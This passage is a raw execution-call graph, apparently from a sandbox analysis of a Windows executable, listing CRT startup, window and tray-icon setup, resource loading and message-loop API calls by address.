                                                                              execution_graph 93760 7d5dfd 93761 7d5e09 __freefls@4 93760->93761 93797 7d7eeb GetStartupInfoW 93761->93797 93763 7d5e0e 93799 7d9ca7 GetProcessHeap 93763->93799 93765 7d5e66 93766 7d5e71 93765->93766 93884 7d5f4d 47 API calls 3 library calls 93765->93884 93800 7d7b47 93766->93800 93769 7d5e77 93770 7d5e82 __RTC_Initialize 93769->93770 93885 7d5f4d 47 API calls 3 library calls 93769->93885 93821 7dacb3 93770->93821 93773 7d5e91 93774 7d5e9d GetCommandLineW 93773->93774 93886 7d5f4d 47 API calls 3 library calls 93773->93886 93840 7e2e7d GetEnvironmentStringsW 93774->93840 93778 7d5e9c 93778->93774 93781 7d5ec2 93853 7e2cb4 93781->93853 93784 7d5ec8 93785 7d5ed3 93784->93785 93888 7d115b 47 API calls 3 library calls 93784->93888 93867 7d1195 93785->93867 93788 7d5edb 93789 7d5ee6 __wwincmdln 93788->93789 93889 7d115b 47 API calls 3 library calls 93788->93889 93871 7b3a0f 93789->93871 93792 7d5efa 93793 7d5f09 93792->93793 93890 7d13f1 47 API calls _doexit 93792->93890 93891 7d1186 47 API calls _doexit 93793->93891 93796 7d5f0e __freefls@4 93798 7d7f01 93797->93798 93798->93763 93799->93765 93892 7d123a 30 API calls 2 library calls 93800->93892 93802 7d7b4c 93893 7d7e23 InitializeCriticalSectionAndSpinCount 93802->93893 93804 7d7b51 93805 7d7b55 93804->93805 93895 7d7e6d TlsAlloc 93804->93895 93894 7d7bbd 50 API calls 2 library calls 93805->93894 93808 7d7b5a 93808->93769 93809 7d7b67 93809->93805 93810 7d7b72 93809->93810 93896 7d6986 93810->93896 93813 7d7bb4 93904 7d7bbd 50 API calls 2 library calls 93813->93904 93816 7d7bb9 93816->93769 93817 7d7b93 93817->93813 93818 7d7b99 93817->93818 93903 7d7a94 47 API calls 4 library calls 93818->93903 93820 7d7ba1 GetCurrentThreadId 93820->93769 93822 7dacbf __freefls@4 93821->93822 93913 7d7cf4 93822->93913 93824 7dacc6 93825 7d6986 __calloc_crt 47 API calls 93824->93825 93826 7dacd7 93825->93826 93827 7dad42 GetStartupInfoW 93826->93827 93828 7dace2 @_EH4_CallFilterFunc@8 __freefls@4 93826->93828 93829 7dad57 93827->93829 93836 7dae80 93827->93836 93828->93773 93833 7d6986 __calloc_crt 47 API calls 93829->93833 93835 7dada5 93829->93835 93829->93836 93830 7daf44 93920 7daf58 LeaveCriticalSection _doexit 93830->93920 93832 7daec9 GetStdHandle 93832->93836 93833->93829 93834 7daedb GetFileType 93834->93836 93835->93836 93838 7dade5 InitializeCriticalSectionAndSpinCount 93835->93838 93839 7dadd7 GetFileType 93835->93839 93836->93830 93836->93832 93836->93834 93837 7daf08 InitializeCriticalSectionAndSpinCount 93836->93837 93837->93836 93838->93835 93839->93835 93839->93838 93841 7e2e8e 93840->93841 93842 7d5ead 93840->93842 93959 7d69d0 47 API calls __crtGetStringTypeA_stat 93841->93959 93847 7e2a7b GetModuleFileNameW 93842->93847 93845 7e2eb4 ___crtGetEnvironmentStringsW 93846 7e2eca FreeEnvironmentStringsW 93845->93846 93846->93842 93848 7e2aaf _wparse_cmdline 93847->93848 93849 7d5eb7 93848->93849 93850 7e2ae9 93848->93850 93849->93781 93887 7d115b 47 API calls 3 library calls 93849->93887 93960 7d69d0 47 API calls __crtGetStringTypeA_stat 93850->93960 93852 7e2aef _wparse_cmdline 93852->93849 93854 7e2cc5 93853->93854 93856 7e2ccd __wsetenvp 93853->93856 93854->93784 93855 7d6986 __calloc_crt 47 API calls 93863 7e2cf6 __wsetenvp 93855->93863 93856->93855 93857 7e2d4d 93858 7d1c9d _free 47 API calls 93857->93858 93858->93854 93859 7d6986 __calloc_crt 47 API calls 93859->93863 93860 7e2d72 93861 7d1c9d _free 47 API calls 93860->93861 93861->93854 93863->93854 93863->93857 93863->93859 93863->93860 93864 7e2d89 93863->93864 93961 7e2567 47 API calls ___strgtold12_l 93863->93961 93962 7d6e20 IsProcessorFeaturePresent 93864->93962 93866 7e2d95 93866->93784 93868 7d11a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 93867->93868 93870 7d11e0 __IsNonwritableInCurrentImage 93868->93870 93985 7d0f0a 52 API calls __cinit 93868->93985 93870->93788 93872 7b3a29 93871->93872 93873 821ebf 93871->93873 93874 7b3a63 IsThemeActive 93872->93874 93986 7d1405 93874->93986 93878 7b3a8f 93998 7b3adb SystemParametersInfoW SystemParametersInfoW 93878->93998 93880 7b3a9b 93999 7b3d19 93880->93999 93882 7b3aa3 SystemParametersInfoW 93883 7b3ac8 93882->93883 93883->93792 93884->93766 93885->93770 93886->93778 93890->93793 93891->93796 93892->93802 93893->93804 93894->93808 93895->93809 93899 7d698d 93896->93899 93898 7d69ca 93898->93813 93902 7d7ec9 TlsSetValue 93898->93902 93899->93898 93900 7d69ab Sleep 93899->93900 93905 7e30aa 93899->93905 93901 7d69c2 93900->93901 93901->93898 93901->93899 93902->93817 93903->93820 93904->93816 93906 7e30b5 93905->93906 93907 7e30d0 __calloc_impl 93905->93907 93906->93907 93908 7e30c1 93906->93908 93909 7e30e0 RtlAllocateHeap 93907->93909 93911 7e30c6 93907->93911 93912 7d7c0e 47 API calls __getptd_noexit 93908->93912 93909->93907 93909->93911 93911->93899 93912->93911 93914 7d7d18 EnterCriticalSection 93913->93914 93915 7d7d05 93913->93915 93914->93824 93921 7d7d7c 93915->93921 93917 7d7d0b 93917->93914 93945 7d115b 47 API calls 3 library calls 93917->93945 93920->93828 93922 7d7d88 __freefls@4 93921->93922 93923 7d7da9 93922->93923 93924 7d7d91 93922->93924 93928 7d7e11 __freefls@4 93923->93928 93937 7d7da7 93923->93937 93946 7d81c2 47 API calls 2 library calls 93924->93946 93927 7d7d96 93947 7d821f 47 API calls 8 library calls 93927->93947 93928->93917 93929 7d7dbd 93931 7d7dc4 93929->93931 93932 7d7dd3 93929->93932 93950 7d7c0e 47 API calls __getptd_noexit 93931->93950 93935 7d7cf4 __lock 46 API calls 93932->93935 93933 7d7d9d 93948 7d1145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 93933->93948 93939 7d7dda 93935->93939 93937->93923 93949 7d69d0 47 API calls __crtGetStringTypeA_stat 93937->93949 93938 7d7dc9 93938->93928 93940 7d7dfe 93939->93940 93941 7d7de9 InitializeCriticalSectionAndSpinCount 93939->93941 93951 7d1c9d 93940->93951 93942 7d7e04 93941->93942 93957 7d7e1a LeaveCriticalSection _doexit 93942->93957 93946->93927 93947->93933 93949->93929 93950->93938 93952 7d1ca6 RtlFreeHeap 93951->93952 93953 7d1ccf __dosmaperr 93951->93953 93952->93953 93954 7d1cbb 93952->93954 93953->93942 93958 7d7c0e 47 API calls __getptd_noexit 93954->93958 93956 7d1cc1 GetLastError 93956->93953 93957->93928 93958->93956 93959->93845 93960->93852 93961->93863 93963 7d6e2b 93962->93963 93968 7d6cb5 93963->93968 93967 7d6e46 93967->93866 93969 7d6ccf _memset __call_reportfault 93968->93969 93970 7d6cef IsDebuggerPresent 93969->93970 93976 7d81ac SetUnhandledExceptionFilter UnhandledExceptionFilter 93970->93976 93973 7d6dd6 93975 7d8197 GetCurrentProcess TerminateProcess 93973->93975 93974 7d6db3 __call_reportfault 93977 7da70c 93974->93977 93975->93967 93976->93974 93978 7da714 93977->93978 93979 7da716 IsProcessorFeaturePresent 93977->93979 93978->93973 93981 7e37b0 93979->93981 93984 7e375f 5 API calls 2 library calls 93981->93984 93983 7e3893 93983->93973 93984->93983 93985->93870 93987 7d7cf4 __lock 47 API calls 93986->93987 93988 7d1410 93987->93988 94051 7d7e58 LeaveCriticalSection 93988->94051 93990 7b3a88 93991 7d146d 93990->93991 93992 7d1491 93991->93992 93993 7d1477 93991->93993 93992->93878 93993->93992 94052 7d7c0e 47 API calls __getptd_noexit 93993->94052 93995 7d1481 94053 7d6e10 8 API calls ___strgtold12_l 93995->94053 93997 7d148c 93997->93878 93998->93880 94000 7b3d26 __ftell_nolock 93999->94000 94054 7bd7f7 94000->94054 94004 7b3d57 IsDebuggerPresent 94005 821cc1 MessageBoxA 94004->94005 94006 7b3d65 94004->94006 94008 821cd9 94005->94008 94006->94008 94009 7b3d82 94006->94009 94037 7b3e3a 94006->94037 94007 7b3e41 SetCurrentDirectoryW 94010 7b3e4e Mailbox 94007->94010 94256 7cc682 48 API calls 94008->94256 94133 7b40e5 94009->94133 94010->93882 94013 821ce9 94018 821cff SetCurrentDirectoryW 94013->94018 94015 7b3da0 GetFullPathNameW 94149 7b6a63 94015->94149 94017 7b3ddb 94160 7b6430 94017->94160 94018->94010 94021 7b3df6 94022 7b3e00 94021->94022 94257 7f71fa AllocateAndInitializeSid CheckTokenMembership FreeSid 94021->94257 94176 7b3e6e GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 94022->94176 94025 821d1c 94025->94022 94028 821d2d 94025->94028 94258 7b5374 94028->94258 94029 7b3e0a 94031 7b3e1f 94029->94031 94184 7b4ffc 94029->94184 94194 7be8d0 94031->94194 94032 821d35 94265 7bce19 94032->94265 94037->94007 94038 821d42 94040 821d49 94038->94040 94041 821d6e 94038->94041 94271 7b518c 94040->94271 94042 7b518c 48 API calls 94041->94042 94044 821d6a GetForegroundWindow ShellExecuteW 94042->94044 94049 821d9e Mailbox 94044->94049 94049->94037 94051->93990 94052->93995 94053->93997 94290 7cf4ea 94054->94290 94056 7bd818 94057 7cf4ea 48 API calls 94056->94057 94058 7b3d31 GetCurrentDirectoryW 94057->94058 94059 7b61ca 94058->94059 94321 7ce99b 94059->94321 94063 7b61eb 94064 7b5374 50 API calls 94063->94064 94065 7b61ff 94064->94065 94066 7bce19 48 API calls 94065->94066 94067 7b620c 94066->94067 94338 7b39db 94067->94338 94069 7b6216 Mailbox 94350 7b6eed 94069->94350 94074 7bce19 48 API calls 94075 7b6244 94074->94075 94357 7bd6e9 94075->94357 94077 7b6254 Mailbox 94078 7bce19 48 API calls 94077->94078 94079 7b627c 94078->94079 94080 7bd6e9 55 API calls 94079->94080 94081 7b628f Mailbox 94080->94081 94082 7bce19 48 API calls 94081->94082 94083 7b62a0 94082->94083 94361 7bd645 94083->94361 94085 7b62b2 Mailbox 94086 7bd7f7 48 API calls 94085->94086 94087 7b62c5 94086->94087 94371 7b63fc 94087->94371 94091 7b62df 94092 7b62e9 94091->94092 94093 821c08 94091->94093 94094 7d0fa7 _W_store_winword 59 API calls 94092->94094 94095 7b63fc 48 API calls 94093->94095 94096 7b62f4 94094->94096 94097 821c1c 94095->94097 94096->94097 94098 7b62fe 94096->94098 94100 7b63fc 48 API calls 94097->94100 94099 7d0fa7 _W_store_winword 59 API calls 94098->94099 94101 7b6309 94099->94101 94102 821c38 94100->94102 94101->94102 94103 7b6313 94101->94103 94104 7b5374 50 API calls 94102->94104 94105 7d0fa7 _W_store_winword 59 API calls 94103->94105 94106 821c5d 94104->94106 94107 7b631e 94105->94107 94108 7b63fc 48 API calls 94106->94108 94109 7b635f 94107->94109 94111 821c86 94107->94111 94114 7b63fc 48 API calls 94107->94114 94112 821c69 94108->94112 94110 7b636c 94109->94110 94109->94111 94387 7cc050 94110->94387 94115 7b6eed 48 API calls 94111->94115 94113 7b6eed 48 API calls 94112->94113 94117 821c77 94113->94117 94118 7b6342 94114->94118 94119 821ca8 94115->94119 94122 7b63fc 48 API calls 94117->94122 94123 7b6eed 48 API calls 94118->94123 94120 7b63fc 48 API calls 94119->94120 94124 821cb5 94120->94124 94121 7b6384 94398 7c1b90 94121->94398 94122->94111 94126 7b6350 94123->94126 94124->94124 94127 7b63fc 48 API calls 94126->94127 94127->94109 94128 7b6394 94129 7c1b90 48 API calls 94128->94129 94131 7b63fc 48 API calls 94128->94131 94132 7b63d6 Mailbox 94128->94132 94414 7b6b68 48 API calls 94128->94414 94129->94128 94131->94128 94132->94004 94134 7b40f2 __ftell_nolock 94133->94134 94135 7b410b 94134->94135 94136 82370e _memset 94134->94136 94923 7b660f 94135->94923 94138 82372a GetOpenFileNameW 94136->94138 94140 823779 94138->94140 94143 7b6a63 48 API calls 94140->94143 94145 82378e 94143->94145 94145->94145 94146 7b4129 94948 7b4139 94146->94948 94150 7b6adf 94149->94150 94153 7b6a6f __wsetenvp 94149->94153 94151 7bb18b 48 API calls 94150->94151 94152 7b6ab6 ___crtGetEnvironmentStringsW 94151->94152 94152->94017 94154 7b6a8b 94153->94154 94155 7b6ad7 94153->94155 95168 7b6b4a 94154->95168 95171 7bc369 48 API calls 94155->95171 94158 7b6a95 94159 7cee75 48 API calls 94158->94159 94159->94152 94161 7b643d __ftell_nolock 94160->94161 95172 7b4c75 94161->95172 94163 7b6442 94175 7b3dee 94163->94175 95183 7b5928 86 API calls 94163->95183 94165 7b644f 94165->94175 95184 7b5798 88 API calls Mailbox 94165->95184 94167 7b6458 94168 7b645c GetFullPathNameW 94167->94168 94167->94175 94169 7b6a63 48 API calls 94168->94169 94170 7b6488 94169->94170 94171 7b6a63 48 API calls 94170->94171 94172 7b6495 94171->94172 94173 825dcf _wcscat 94172->94173 94174 7b6a63 48 API calls 94172->94174 94174->94175 94175->94013 94175->94021 94177 7b3ed8 94176->94177 94178 821cba 94176->94178 95231 7b4024 94177->95231 94182 7b3e05 94183 7b36b8 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 94182->94183 94183->94029 94185 7b5027 _memset 94184->94185 95236 7b4c30 94185->95236 94188 7b50ac 94190 7b50ca Shell_NotifyIconW 94188->94190 94191 823d28 Shell_NotifyIconW 94188->94191 95240 7b51af 94190->95240 94193 7b50df 94193->94031 94195 7be8f6 94194->94195 94218 7be906 Mailbox 94194->94218 94197 7bed52 94195->94197 94195->94218 94196 7fcc5c 86 API calls 94196->94218 95389 7ce3cd 331 API calls 94197->95389 94198 7bebc7 94200 7b3e2a 94198->94200 95390 7b2ff6 16 API calls 94198->95390 94200->94037 94255 7b3847 Shell_NotifyIconW _memset 94200->94255 94202 7bed63 94202->94200 94204 7bed70 94202->94204 94203 7be94c PeekMessageW 94203->94218 95391 7ce312 331 API calls Mailbox 94204->95391 94206 82526e Sleep 94206->94218 94207 7bed77 LockWindowUpdate DestroyWindow GetMessageW 94207->94200 94209 7beda9 94207->94209 94210 8259ef TranslateMessage DispatchMessageW GetMessageW 94209->94210 94210->94210 94213 825a1f 94210->94213 94212 7b1caa 49 API calls 94212->94218 94213->94200 94214 7bed21 PeekMessageW 94214->94218 94216 7bebf7 timeGetTime 94216->94218 94217 7b6eed 48 API calls 94217->94218 94218->94196 94218->94198 94218->94203 94218->94206 94218->94212 94218->94214 94218->94216 94218->94217 94219 7bed3a TranslateMessage DispatchMessageW 94218->94219 94220 7cf4ea 48 API calls 94218->94220 94221 825557 WaitForSingleObject 94218->94221 94223 82588f Sleep 94218->94223 94225 7bedae timeGetTime 94218->94225 94228 825733 Sleep 94218->94228 94230 7b2aae 307 API calls 94218->94230 94236 825445 Sleep 94218->94236 94245 825429 Mailbox 94218->94245 94253 7bce19 48 API calls 94218->94253 94254 7bd6e9 55 API calls 94218->94254 95263 7bef00 94218->95263 95270 7bf110 94218->95270 95335 7c45e0 94218->95335 95352 7ce244 94218->95352 95357 7cdc5f 94218->95357 95362 7beed0 331 API calls Mailbox 94218->95362 95363 7c3200 94218->95363 95393 818d23 48 API calls 94218->95393 95397 7bfe30 94218->95397 94219->94214 94220->94218 94221->94218 94224 825574 GetExitCodeProcess CloseHandle 94221->94224 94222 7bd7f7 48 API calls 94222->94245 94223->94245 94224->94218 95392 7b1caa 49 API calls 94225->95392 94228->94245 94230->94218 94232 7cdc38 timeGetTime 94232->94245 94233 825926 GetExitCodeProcess 94234 825952 CloseHandle 94233->94234 94235 82593c WaitForSingleObject 94233->94235 94234->94245 94235->94218 94235->94234 94236->94218 94237 7b2c79 107 API calls 94237->94245 94239 825432 Sleep 94239->94236 94240 818c4b 108 API calls 94240->94245 94241 8259ae Sleep 94241->94218 94243 7bce19 48 API calls 94243->94245 94245->94218 94245->94222 94245->94232 94245->94233 94245->94236 94245->94237 94245->94239 94245->94240 94245->94241 94245->94243 94248 7bd6e9 55 API calls 94245->94248 95394 7f4cbe 49 API calls Mailbox 94245->95394 95395 7b1caa 49 API calls 94245->95395 95396 7b2aae 331 API calls 94245->95396 95426 80ccb2 50 API calls 94245->95426 95427 7f7a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 94245->95427 95428 7f6532 63 API calls 3 library calls 94245->95428 94248->94245 94253->94218 94254->94218 94255->94037 94256->94013 94257->94025 94259 7df8a0 __ftell_nolock 94258->94259 94260 7b5381 GetModuleFileNameW 94259->94260 94261 7bce19 48 API calls 94260->94261 94262 7b53a7 94261->94262 94263 7b660f 49 API calls 94262->94263 94264 7b53b1 Mailbox 94263->94264 94264->94032 94266 7bce28 __wsetenvp 94265->94266 94267 7cee75 48 API calls 94266->94267 94268 7bce50 ___crtGetEnvironmentStringsW 94267->94268 94269 7cf4ea 48 API calls 94268->94269 94270 7bce66 94269->94270 94270->94038 94272 7b5197 94271->94272 94273 7b519f 94272->94273 94274 821ace 94272->94274 95723 7b5130 94273->95723 94275 7b6b4a 48 API calls 94274->94275 94278 821adb __wsetenvp 94275->94278 94277 7b51aa 94281 7b510d 94277->94281 94279 7cee75 48 API calls 94278->94279 94280 821b07 ___crtGetEnvironmentStringsW 94279->94280 94282 7b511f 94281->94282 94283 821be7 94281->94283 95733 7bb384 94282->95733 95742 7ea58f 48 API calls ___crtGetEnvironmentStringsW 94283->95742 94286 821bf1 94288 7b6eed 48 API calls 94286->94288 94287 7b512b 94289 821bf9 Mailbox 94288->94289 94293 7cf4f2 __calloc_impl 94290->94293 94292 7cf50c 94292->94056 94293->94292 94294 7cf50e std::exception::exception 94293->94294 94299 7d395c 94293->94299 94313 7d6805 RaiseException 94294->94313 94296 7cf538 94314 7d673b 47 API calls _free 94296->94314 94298 7cf54a 94298->94056 94300 7d39d7 __calloc_impl 94299->94300 94303 7d3968 __calloc_impl 94299->94303 94320 7d7c0e 47 API calls __getptd_noexit 94300->94320 94301 7d3973 94301->94303 94315 7d81c2 47 API calls 2 library calls 94301->94315 94316 7d821f 47 API calls 8 library calls 94301->94316 94317 7d1145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 94301->94317 94303->94301 94305 7d399b RtlAllocateHeap 94303->94305 94308 7d39c3 94303->94308 94311 7d39c1 94303->94311 94305->94303 94306 7d39cf 94305->94306 94306->94293 94318 7d7c0e 47 API calls __getptd_noexit 94308->94318 94319 7d7c0e 47 API calls __getptd_noexit 94311->94319 94313->94296 94314->94298 94315->94301 94316->94301 94318->94311 94319->94306 94320->94306 94322 7bd7f7 48 API calls 94321->94322 94323 7b61db 94322->94323 94324 7b6009 94323->94324 94325 7b6016 __ftell_nolock 94324->94325 94326 7b6a63 48 API calls 94325->94326 94330 7b617c Mailbox 94325->94330 94328 7b6048 94326->94328 94336 7b607e Mailbox 94328->94336 94415 7b61a6 94328->94415 94329 7b614f 94329->94330 94331 7bce19 48 API calls 94329->94331 94330->94063 94333 7b6170 94331->94333 94332 7bce19 48 API calls 94332->94336 94334 7b64cf 48 API calls 94333->94334 94334->94330 94336->94329 94336->94330 94336->94332 94337 7b61a6 48 API calls 94336->94337 94418 7b64cf 94336->94418 94337->94336 94441 7b41a9 94338->94441 94341 7b3a06 94341->94069 94344 822ff0 94345 7d1c9d _free 47 API calls 94344->94345 94347 822ffd 94345->94347 94348 7b4252 84 API calls 94347->94348 94349 823006 94348->94349 94349->94349 94351 7b6ef8 94350->94351 94352 7b622b 94350->94352 94911 7bdd47 48 API calls ___crtGetEnvironmentStringsW 94351->94911 94354 7b9048 94352->94354 94355 7cf4ea 48 API calls 94354->94355 94356 7b6237 94355->94356 94356->94074 94358 7bd6f4 94357->94358 94359 7bd71b 94358->94359 94912 7bd764 55 API calls 94358->94912 94359->94077 94362 7bd654 94361->94362 94369 7bd67e 94361->94369 94363 7bd65b 94362->94363 94366 7bd6c2 94362->94366 94364 7bd666 94363->94364 94370 7bd6ab 94363->94370 94913 7bd9a0 53 API calls __cinit 94364->94913 94366->94370 94915 7cdce0 53 API calls 94366->94915 94369->94085 94370->94369 94914 7cdce0 53 API calls 94370->94914 94372 7b641f 94371->94372 94373 7b6406 94371->94373 94374 7b6a63 48 API calls 94372->94374 94375 7b6eed 48 API calls 94373->94375 94376 7b62d1 94374->94376 94375->94376 94377 7d0fa7 94376->94377 94378 7d1028 94377->94378 94379 7d0fb3 94377->94379 94918 7d103a 59 API calls 3 library calls 94378->94918 94386 7d0fd8 94379->94386 94916 7d7c0e 47 API calls __getptd_noexit 94379->94916 94382 7d1035 94382->94091 94383 7d0fbf 94917 7d6e10 8 API calls ___strgtold12_l 94383->94917 94385 7d0fca 94385->94091 94386->94091 94388 7cc064 94387->94388 94390 7cc069 Mailbox 94387->94390 94919 7cc1af 48 API calls 94388->94919 94396 7cc077 94390->94396 94920 7cc15c 48 API calls 94390->94920 94392 7cf4ea 48 API calls 94394 7cc108 94392->94394 94393 7cc152 94393->94121 94395 7cf4ea 48 API calls 94394->94395 94397 7cc113 94395->94397 94396->94392 94396->94393 94397->94121 94397->94397 94399 7c1cf6 94398->94399 94401 7c1ba2 94398->94401 94399->94128 94400 7c1c5d 94400->94128 94404 7cf4ea 48 API calls 94401->94404 94412 7c1bae 94401->94412 94403 7c1bb9 94403->94400 94407 7cf4ea 48 API calls 94403->94407 94405 8249c4 94404->94405 94406 7cf4ea 48 API calls 94405->94406 94413 8249cf 94406->94413 94408 7c1c9f 94407->94408 94409 7c1cb2 94408->94409 94921 7b2925 48 API calls 94408->94921 94409->94128 94411 7cf4ea 48 API calls 94411->94413 94412->94403 94922 7cc15c 48 API calls 94412->94922 94413->94411 94413->94412 94414->94128 94424 7bbdfa 94415->94424 94417 7b61b1 94417->94328 94419 7b651b 94418->94419 94423 7b64dd ___crtGetEnvironmentStringsW 94418->94423 94421 7cf4ea 48 API calls 94419->94421 94420 7cf4ea 48 API calls 94422 7b64e4 94420->94422 94421->94423 94422->94336 94423->94420 94425 7bbe0d 94424->94425 94429 7bbe0a ___crtGetEnvironmentStringsW 94424->94429 94426 7cf4ea 48 API calls 94425->94426 94427 7bbe17 94426->94427 94430 7cee75 94427->94430 94429->94417 94432 7cf4ea __calloc_impl 94430->94432 94431 7d395c __crtGetStringTypeA_stat 47 API calls 94431->94432 94432->94431 94433 7cf50c 94432->94433 94434 7cf50e std::exception::exception 94432->94434 94433->94429 94439 7d6805 RaiseException 94434->94439 94436 7cf538 94440 7d673b 47 API calls _free 94436->94440 94438 7cf54a 94438->94429 94439->94436 94440->94438 94506 7b4214 94441->94506 94446 824f73 94448 7b4252 84 API calls 94446->94448 94447 7b41d4 LoadLibraryExW 94516 7b4291 94447->94516 94450 824f7a 94448->94450 94452 7b4291 3 API calls 94450->94452 94454 824f82 94452->94454 94542 7b44ed 94454->94542 94455 7b41fb 94455->94454 94456 7b4207 94455->94456 94457 7b4252 84 API calls 94456->94457 94459 7b39fe 94457->94459 94459->94341 94465 7fc396 94459->94465 94462 824fa9 94550 7b4950 94462->94550 94464 824fb6 94466 7b4517 83 API calls 94465->94466 94467 7fc405 94466->94467 94731 7fc56d 94467->94731 94470 7b44ed 64 API calls 94471 7fc432 94470->94471 94472 7b44ed 64 API calls 94471->94472 94473 7fc442 94472->94473 94474 7b44ed 64 API calls 94473->94474 94475 7fc45d 94474->94475 94476 7b44ed 64 API calls 94475->94476 94477 7fc478 94476->94477 94478 7b4517 83 API calls 94477->94478 94479 7fc48f 94478->94479 94480 7d395c __crtGetStringTypeA_stat 47 API calls 94479->94480 94481 7fc496 94480->94481 94482 7d395c __crtGetStringTypeA_stat 47 API calls 94481->94482 94483 7fc4a0 94482->94483 94484 7b44ed 64 API calls 94483->94484 94485 7fc4b4 94484->94485 94486 7fbf5a GetSystemTimeAsFileTime 94485->94486 94487 7fc4c7 94486->94487 94488 7fc4dc 94487->94488 94489 7fc4f1 94487->94489 94490 7d1c9d _free 47 API calls 94488->94490 94491 7fc4f7 94489->94491 94492 7fc556 94489->94492 94494 7fc4e2 94490->94494 94737 7fb965 94491->94737 94493 7d1c9d _free 47 API calls 94492->94493 94498 7fc41b 94493->94498 94496 7d1c9d _free 47 API calls 94494->94496 94496->94498 94498->94344 94500 7b4252 94498->94500 94499 7d1c9d _free 47 API calls 94499->94498 94501 7b425c 94500->94501 94503 7b4263 94500->94503 94502 7d35e4 __fcloseall 83 API calls 94501->94502 94502->94503 94504 7b4283 FreeLibrary 94503->94504 94505 7b4272 94503->94505 94504->94505 94505->94344 94555 7b4339 94506->94555 94509 7b423c 94511 7b41bb 94509->94511 94512 7b4244 FreeLibrary 94509->94512 94513 7d3499 94511->94513 94512->94511 94563 7d34ae 94513->94563 94515 7b41c8 94515->94446 94515->94447 94642 7b42e4 94516->94642 94519 7b42b8 94520 7b41ec 94519->94520 94521 7b42c1 FreeLibrary 94519->94521 94523 7b4380 94520->94523 94521->94520 94524 7cf4ea 48 API calls 94523->94524 94525 7b4395 94524->94525 94650 7b47b7 94525->94650 94527 7b43a1 ___crtGetEnvironmentStringsW 94528 7b43dc 94527->94528 94530 7b4499 94527->94530 94531 7b44d1 94527->94531 94529 7b4950 57 API calls 94528->94529 94535 7b43e5 94529->94535 94653 7b406b CreateStreamOnHGlobal 94530->94653 94664 7fc750 93 API calls 94531->94664 94534 7b44ed 64 API calls 94534->94535 94535->94534 94537 7b4479 94535->94537 94538 824ed7 94535->94538 94659 7b4517 94535->94659 94537->94455 94539 7b4517 83 API calls 94538->94539 94540 824eeb 94539->94540 94541 7b44ed 64 API calls 94540->94541 94541->94537 94543 7b44ff 94542->94543 94546 824fc0 94542->94546 94688 7d381e 94543->94688 94547 7fbf5a 94708 7fbdb4 94547->94708 94549 7fbf70 94549->94462 94551 7b495f 94550->94551 94554 825002 94550->94554 94713 7d3e65 94551->94713 94553 7b4967 94553->94464 94559 7b434b 94555->94559 94558 7b4321 LoadLibraryA GetProcAddress 94558->94509 94560 7b422f 94559->94560 94561 7b4354 LoadLibraryA 94559->94561 94560->94509 94560->94558 94561->94560 94562 7b4365 GetProcAddress 94561->94562 94562->94560 94566 7d34ba __freefls@4 94563->94566 94564 7d34cd 94611 7d7c0e 47 API calls __getptd_noexit 94564->94611 94566->94564 94567 7d34fe 94566->94567 94582 7de4c8 94567->94582 94568 7d34d2 94612 7d6e10 8 API calls ___strgtold12_l 94568->94612 94571 7d3503 94572 7d350c 94571->94572 94573 7d3519 94571->94573 94613 7d7c0e 47 API calls __getptd_noexit 94572->94613 94575 7d3543 94573->94575 94576 7d3523 94573->94576 94596 7de5e0 94575->94596 94614 7d7c0e 47 API calls __getptd_noexit 94576->94614 94577 7d34dd @_EH4_CallFilterFunc@8 __freefls@4 94577->94515 94583 7de4d4 __freefls@4 94582->94583 94584 7d7cf4 __lock 47 API calls 94583->94584 94591 7de4e2 94584->94591 94585 7de559 94621 7d69d0 47 API calls __crtGetStringTypeA_stat 94585->94621 94588 7de560 94590 7de56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 94588->94590 94594 7de552 94588->94594 94589 7de5cc __freefls@4 94589->94571 94590->94594 94591->94585 94592 7d7d7c __mtinitlocknum 47 API calls 94591->94592 94591->94594 94619 7d4e5b 48 API calls __lock 94591->94619 94620 7d4ec5 LeaveCriticalSection LeaveCriticalSection _doexit 94591->94620 94592->94591 94616 7de5d7 94594->94616 94597 7de600 __wopenfile 94596->94597 94598 7de61a 94597->94598 94610 7de7d5 94597->94610 94628 7d185b 59 API calls 2 library calls 94597->94628 94626 7d7c0e 47 API calls __getptd_noexit 94598->94626 94600 7de61f 94627 7d6e10 8 API calls ___strgtold12_l 94600->94627 94602 7de838 94623 7e63c9 94602->94623 94604 7d354e 94615 7d3570 LeaveCriticalSection LeaveCriticalSection _fseek 94604->94615 94606 7de7ce 94606->94610 94629 7d185b 59 API calls 2 library calls 94606->94629 94608 7de7ed 94608->94610 94630 7d185b 59 API calls 2 library calls 94608->94630 94610->94598 94610->94602 94611->94568 94612->94577 94613->94577 94614->94577 94615->94577 94622 7d7e58 LeaveCriticalSection 94616->94622 94618 7de5de 94618->94589 94619->94591 94620->94591 94621->94588 94622->94618 94631 7e5bb1 94623->94631 94625 7e63e2 94625->94604 94626->94600 94627->94604 94628->94606 94629->94608 94630->94610 94632 7e5bbd __freefls@4 94631->94632 94633 7e5bcf 94632->94633 94636 7e5c06 94632->94636 94634 7d7c0e ___strgtold12_l 47 API calls 94633->94634 94635 7e5bd4 94634->94635 94637 7d6e10 ___strgtold12_l 8 API calls 94635->94637 94638 7e5c78 __wsopen_helper 110 API calls 94636->94638 94641 7e5bde __freefls@4 94637->94641 94639 7e5c23 94638->94639 94640 7e5c4c __wsopen_helper LeaveCriticalSection 94639->94640 94640->94641 94641->94625 94646 7b42f6 94642->94646 94645 7b42cc LoadLibraryA GetProcAddress 94645->94519 94647 7b42aa 94646->94647 94648 7b42ff LoadLibraryA 94646->94648 94647->94519 94647->94645 94648->94647 94649 7b4310 GetProcAddress 94648->94649 94649->94647 94651 7cf4ea 48 API calls 94650->94651 94652 7b47c9 94651->94652 94652->94527 94654 7b4085 FindResourceExW 94653->94654 94658 7b40a2 94653->94658 94655 824f16 LoadResource 94654->94655 94654->94658 94656 824f2b SizeofResource 94655->94656 94655->94658 94657 824f3f LockResource 94656->94657 94656->94658 94657->94658 94658->94528 94660 824fe0 94659->94660 94661 7b4526 94659->94661 94665 7d3a8d 94661->94665 94663 7b4534 94663->94535 94664->94528 94666 7d3a99 __freefls@4 94665->94666 94667 7d3aa7 94666->94667 94669 7d3acd 94666->94669 94678 7d7c0e 